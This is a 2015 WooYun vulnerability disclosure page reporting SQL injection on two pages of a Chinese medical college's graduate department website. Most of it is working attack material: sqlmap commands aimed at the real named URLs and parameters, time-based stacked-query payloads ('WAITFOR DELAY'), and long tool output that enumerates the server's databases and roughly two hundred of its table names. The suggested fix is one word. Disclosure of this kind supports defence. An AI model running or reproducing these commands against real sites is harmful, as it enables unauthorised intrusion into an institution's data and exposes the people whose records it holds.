当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114197

漏洞标题:贵阳医学院研究生部SQL注射漏洞

相关厂商:贵阳医学院研究生部

漏洞作者: 凌零1

提交时间:2015-05-15 11:44

修复时间:2015-05-20 11:46

公开时间:2015-05-20 11:46

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:4

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-15: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

随便逛逛,发现了这个小洞

详细说明:

python 
1.
sqlmap.
py -u "http://yjsb.gmc.edu.cn/bmzz/index.asp?bmid=13&bmmc=%E5%AD%A6%E4%BD%8D%E5%
8A%9E%E5%85%AC%E5%AE%A4" -p bmid


GET parameter 'bmid' is vulnerable. Do you want to keep testing the others 
(if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP
(s) requ
ests:
---
Parameter: bmid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: bmid=13;WAITFOR DELAY '0:0:5'--&bmmc=%E5%AD%A6%E4%BD%8D
%E5%8A%9E%E5
%85%AC%E5%AE%A4
---
[17:07:42] [INFO] testing Microsoft SQL Server
[17:07:42] [WARNING] it is very important not to stress the network 
adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses 
(option
'--time-sec')? [Y/n]
[17:07:49] [INFO] confirming Microsoft SQL Server
[17:07:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:07:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:07:55] [INFO] fetched data logged to text files under 'C:\Users\wjl
\.sqlmap\
output\yjsb.gmc.edu.cn'

哈哈,堆查询
再来一个:
2.
http://yjsb.gmc.edu.cn/yzxx/yjxx.asp?ID=153

GET parameter 'ID' is vulnerable. Do you want to keep testing the others 
(if any
)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP
(s) requ
ests:
---
Parameter: ID (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=153;WAITFOR DELAY '0:0:5'--
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[17:33:35] [INFO] testing Microsoft SQL Server

漏洞证明:

数据库:
available databases [7]:
[*] gedu
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
跑表太慢咯!!!

[23:38:34] [INFO] fetching database names
[23:38:34] [INFO] fetching number of databases
[23:38:34] [INFO] resumed: 7
[23:38:34] [INFO] resumed: gedu
[23:38:34] [INFO] resumed: master
[23:38:34] [INFO] resumed: model
[23:38:34] [INFO] resumed: msdb
[23:38:34] [INFO] resumed: Northwind
[23:38:34] [INFO] resumed: pubs
[23:38:34] [INFO] resumed: tempdb
[23:38:34] [INFO] fetching tables for databases: Northwind, gedu, master, model,
 msdb, pubs, tempdb
[23:38:34] [INFO] fetching number of tables for database 'tempdb'
[23:38:34] [INFO] resumed: 2
[23:38:34] [INFO] resumed: dbo.sysconstraints
[23:38:34] [INFO] resumed: dbo.syssegments
[23:38:34] [INFO] fetching number of tables for database 'gedu'
[23:38:34] [INFO] resumed: 281
[23:38:34] [INFO] resumed: dbo.aaaa
[23:38:34] [INFO] resumed: dbo.address
[23:38:34] [INFO] resumed: dbo.b03jbk
[23:38:34] [INFO] resumed: dbo.b04jbk
[23:38:34] [INFO] resumed: dbo.b04md
[23:38:34] [INFO] resumed: dbo.BDK
[23:38:34] [INFO] resumed: dbo.bmgly
[23:38:34] [INFO] resumed: dbo.bmqxb
[23:38:34] [INFO] resumed: dbo.bscjkA
[23:38:34] [INFO] resumed: dbo.bsk
[23:38:34] [INFO] resumed: dbo.CJSHK
[23:38:34] [INFO] resumed: dbo.count
[23:38:34] [INFO] resumed: dbo.count_bak
[23:38:34] [INFO] resumed: dbo.czqxb
[23:38:34] [INFO] resumed: dbo.czyb
[23:38:34] [INFO] resumed: dbo.DBDMK
[23:38:34] [INFO] resumed: dbo.DSJSJBXX
[23:38:34] [INFO] resumed: dbo.dsjsjbxx_inform
[23:38:34] [INFO] resumed: dbo.DSJSMM!
[23:38:34] [INFO] resumed: dbo.dtproperties
[23:38:34] [INFO] resumed: dbo.dwmc_jjk
[23:38:34] [INFO] resumed: dbo.dWMCK
[23:38:34] [INFO] resumed: dbo.DWXWLBKA
[23:38:34] [INFO] resumed: dbo.f_servwed
[23:38:34] [INFO] resumed: dbo.FACCDM
[23:38:34] [INFO] resumed: dbo.friend
[23:38:34] [INFO] resumed: dbo.GLY
[23:38:34] [INFO] resumed: dbo.GLYK
[23:38:34] [INFO] resumed: dbo.GRPYJHZK
[23:38:34] [INFO] resumed: dbo.grpyjhzk_bak
[23:38:34] [INFO] resumed: dbo.grpyjhzk_bg
[23:38:34] [INFO] resumed: dbo.grpyjhzk_bg_bak
[23:38:34] [INFO] resumed: dbo.grpyjhzk_nd
[23:38:34] [INFO] resumed: dbo.grpyjhzk_nd_bak
[23:38:34] [INFO] resumed: dbo.GRPYJHZK_sav
[23:38:34] [INFO] resumed: dbo.GRPYJHZK_temp
[23:38:34] [INFO] resumed: dbo.gxdm
[23:38:34] [INFO] resumed: dbo.hyxxk
[23:38:34] [INFO] resumed: dbo.jckcdyb
[23:38:34] [INFO] resumed: dbo.JFK
[23:38:34] [INFO] resumed: dbo.jgy02jbk
[23:38:34] [INFO] resumed: dbo.jwyk
[23:38:34] [INFO] resumed: dbo.JXPJB
[23:38:34] [INFO] resumed: dbo.JXPJJCa\x13!\x06!\t\x0b\x03I\x03
[23:38:34] [INFO] resumed: dbo.JXPJXNB
[23:38:34] [INFO] resumed: dbo.JXSJBXX
[23:38:34] [INFO] resumed: dbo.KCCCDMK
[23:38:34] [INFO] resumed: dbo.kqjxdgxsb
[23:38:34] [INFO] resumed: dbo.NEXTXQKCKH\t
[23:38:34] [INFO] resumed: dbo.nong03
[23:38:34] [INFO] resumed: dbo.pbcatcolQ
[23:38:34] [INFO] resumed: dbo.pbcatedt
[23:38:34] [INFO] resumed: dbo.pbcatfmt
[23:38:34] [INFO] resumed: dbo.pbcattbl
[23:38:34] [INFO] resumed: dbo.pbcatvld
[23:38:34] [INFO] resumed: dbo.preXQKCJH
[23:38:34] [INFO] resumed: dbo.PreYJSXKK
[23:38:34] [INFO] resumed: dbo.PYJHZK
[23:38:34] [INFO] resumed: dbo.PYJHZK_JXB
[23:38:34] [INFO] resumed: dbo.PYJHZK_NEW
[23:38:34] [INFO] resumed: dbo.pyjhzk_yjfx
[23:38:34] [INFO] resumed: dbo.reg
[23:38:34] [INFO] resumed: dbo.sykck
[23:38:34] [INFO] resumed: dbo.sysconstraints
[23:38:34] [INFO] resumed: dbo.syssegmints
[23:38:34] [INFO] resumed: dbo.t_jiaozhu
[23:38:34] [INFO] resumed: dbo.T_ZY_TeacherInfo
[23:38:34] [INFO] resumed: dbo.tb_bboodel
[23:38:34] [INFO] resumed: dbo.tb_bm_onff
[23:38:34] [INFO] resumed: dbo.tb_bmd
[23:38:34] [INFO] resumed: dbo.tb_bysk
[23:38:34] [INFO] resumed: dbo.tb_dept
[23:38:34] [INFO] resumed: dbo.tb_form_dlk
[23:38:34] [INFO] resumed: dbo.tb_form_dlxl
[23:38:34] [INFO] resumed: dbo.tb_fsx
[23:38:34] [INFO] resumed: dbo.tb_fsx2
[23:38:34] [INFO] resumed: dbo.tb_fxstzhk
[23:38:34] [INFO] resumed: dbo.tb_frpyjh_rec
[23:38:34] [INFO] resumed: dbo.tb_gxzydm
[23:38:34] [INFO] resumed: dbo.tb_gxzydm_bk
[23:38:34] [INFO] resumed: dbo.tb_his_goods_show
[23:38:34] [INFO] resumed: dbo.tb_hxtjk
[23:38:34] [INFO] resumed: dbo.tb_jyss_inform
[23:38:34] [INFO] resumed: dbo.tb_kebiao_bz
[23:38:34] [INFO] resumed: dbo.tb_kebiao_model
[23:38:34] [INFO] resumed: dbo.tb_kskmk
[23:38:34] [INFO] resumed: dbo.tb_kssjk
[23:38:34] [INFO] resumed: dbo.tb_lqka
[23:38:34] [INFO] resumed: dbo.tb_nlq
[23:38:34] [INFO] resumed: dbo.tb_nlq_temp
[23:38:34] [INFO] resumed: dbo.tb_paike_temp
[23:38:34] [INFO] resumed: dbo.tb_skdddm
[23:38:34] [INFO] resumed: dbo.tb_sksjdm
[23:38:34] [INFO] resumed: dbo.tb_staff_info
[23:38:34] [INFO] resumed: dbo.tb_systb
[23:38:34] [INFO] resumed: dbo.tb_systb_copy
[23:38:34] [INFO] resumed: dbo.tb_systb_resouce
[23:38:34] [INFO] resumed: dbo.tb_unjssksj
[23:38:34] [INFO] resumed: dbo.tb_winbill
[23:38:34] [INFO] resumed: dbo.tb_yjfxk
[23:38:34] [INFO] resumed: dbo.tb_zy
[23:38:34] [INFO] resumed: dbo.tb_zyxsk
[23:38:34] [INFO] resumed: dbo.tbs_area
[23:38:34] [INFO] resumed: dbo.tbs_bill_item_class
[23:38:34] [INFO] resumed: dbo.tbs_bilb
[23:38:34] [INFO] resumed: dbo.tbs_cfmc
[23:38:34] [INFO] resumed: dbo.tbs_cfmnese_mark
[23:38:34] [INFO] resumed: dbo.tbs_chinese_w
[23:38:34] [INFO] resumed: dbo.tbs_cjdj
[23:38:34] [INFO] resumed: dbo.tbs_cjljz
[23:38:34] [INFO] resumed: dbo.tbs_cjlx
[23:38:34] [INFO] resumed: dbo.tbs_cjsjz
[23:38:34] [INFO] resumed: dbo.tbs_country
[23:38:34] [INFO] resumed: dbo.tbs_fpdwlb
[23:38:34] [INFO] resumed: dbo.tbs_gatq
[23:38:34] [INFO] resumed: dbo.tbs_gxdm
[23:38:34] [INFO] resumed: dbo.tbs_gxdm_old
[23:38:34] [INFO] resumed: dbo.tbs_jfdm
[23:38:34] [INFO] resumed: dbo.tbs_jkzk
[23:38:34] [INFO] resumed: dbo.tbs_jljb
[23:38:34] [INFO] resumed: dbo.tbs_kkcc
[23:38:34] [INFO] resumed: dbo.tbs_ksfs
[23:38:34] [INFO] resumed: dbo.tbs_ksfs_zs
[23:38:34] [INFO] resumed: dbo.tbs_marital_status
[23:38:34] [INFO] resumed: dbo.tbs_mj
[23:38:34] [INFO] resumed: dbo.tbs_nation
[23:38:34] [INFO] resumed: dbo.tbs_nj
[23:38:34] [INFO] resumed: dbo.tbs_pyfs
[23:38:34] [INFO] resumed: dbo.tbs_relationship
[23:38:34] [INFO] resumed: dbo.tbs_rkjs
[23:38:34] [INFO] resumed: dbo.tbs_ssdok
[23:38:34] [INFO] resumed: dbo.tbs_ssjl
[23:38:34] [INFO] resumed: dbo.tbs_tech_title
[23:38:34] [INFO] resumed: dbo.tbs_xj_status
[23:38:34] [INFO] resumed: dbo.tbs_xjyd
[23:38:34] [INFO] resumed: dbo.tbs_xk_1
[23:38:34] [INFO] resumed: dbo.tbs_xklb
[23:38:34] [INFO] resumed: dbo.tbs_xl
[23:38:34] [INFO] resumed: dbo.tbs_xmlx
[23:38:34] [INFO] resumed: dbo.tbs_xmly
[23:38:34] [INFO] resumed: dbo.tbs_xq
[23:38:34] [INFO] resumed: dbo.tbs_xq_year
[23:38:34] [INFO] resumed: dbo.tbs_xq_year_nj
[23:38:34] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
d
[23:39:10] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
b
[23:39:21] [INFO] adjusting time delay to 1 second due to good response times
o.tbs_xqxk_onff
[23:40:15] [INFO] retrieved: dbo.tbs_xqxk_onff_b
[23:40:48] [INFO] retrieved: dbo.tbs_xshjlb
[23:41:30] [INFO] retrieved: dbo.tbs_xslb
[23:41:55] [INFO] retrieved: dbo.tbs_xsly
[23:42:16] [INFO] retrieved: dbo.tbs_xsresource
[23:43:13] [INFO] retrieved: dbo.tbs_xtyhb
[23:43:48] [INFO] retrieved: dbo.tbs_xuewei
[23:44:28] [INFO] retrieved: dbo.tbs_xuezhi
[23:45:01] [INFO] retrieved: dbo.tbs_xwdwdm
[23:45:43] [INFO] retrieved: dbo.tbs_xwdwdm_old
[23:46:27] [INFO] retrieved: dbo.tbs_xx
[23:46:47] [INFO] retrieved: dbo.tbs_xxbxlx
[23:47:27] [INFO] retrieved: dbo.tbs_xxdm
[23:47:51] [INFO] retrieved: dbo.tbs_xxdm_c
[23:48:19] [INFO] retrieved: dbo.tbs_xxfs
[23:48:43] [INFO] retrieved: dbo.tbs_xxjbz
[23:49:13] [INFO] retrieved: dbo.tbs_xxxz
[23:49:41] [INFO] retrieved: dbo.tbs_zhiye
[23:50:20] [INFO] retrieved: dbo.tbs_zjlx
[23:50:52] [INFO] retrieved: dbo.tbs_zycc
[23:51:20] [INFO] retrieved: dbo.tdxl
[23:51:51] [ERROR] invalid character detected. retrying..
[23:51:51] [WARNING] increasing time delay to 2 seconds
bs
[23:52:09] [INFO] retrieved: dbo.tdxlss
[23:52:48] [INFO] retrieved: dbo.temp_cjk
[23:54:10] [INFO] retrieved: dbo.view_jwyxqcjcx
[23:56:40] [INFO] retrieved: dbo.view_jwyxqcjcx1
[23:57:27] [INFO] retrieved: dbo.XBMK
[23:58:10] [INFO] retrieved: dbo.xqkc_wt
[23:59:42] [ERROR] invalid character detected. retrying..
[23:59:42] [WARNING] increasing time delay to 3 seconds
jc


点到为止

修复方案:

过滤~~

版权声明:转载请注明来源 凌零1@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-20 11:46

厂商回复:

最新状态:

暂无

漏洞评价:

评论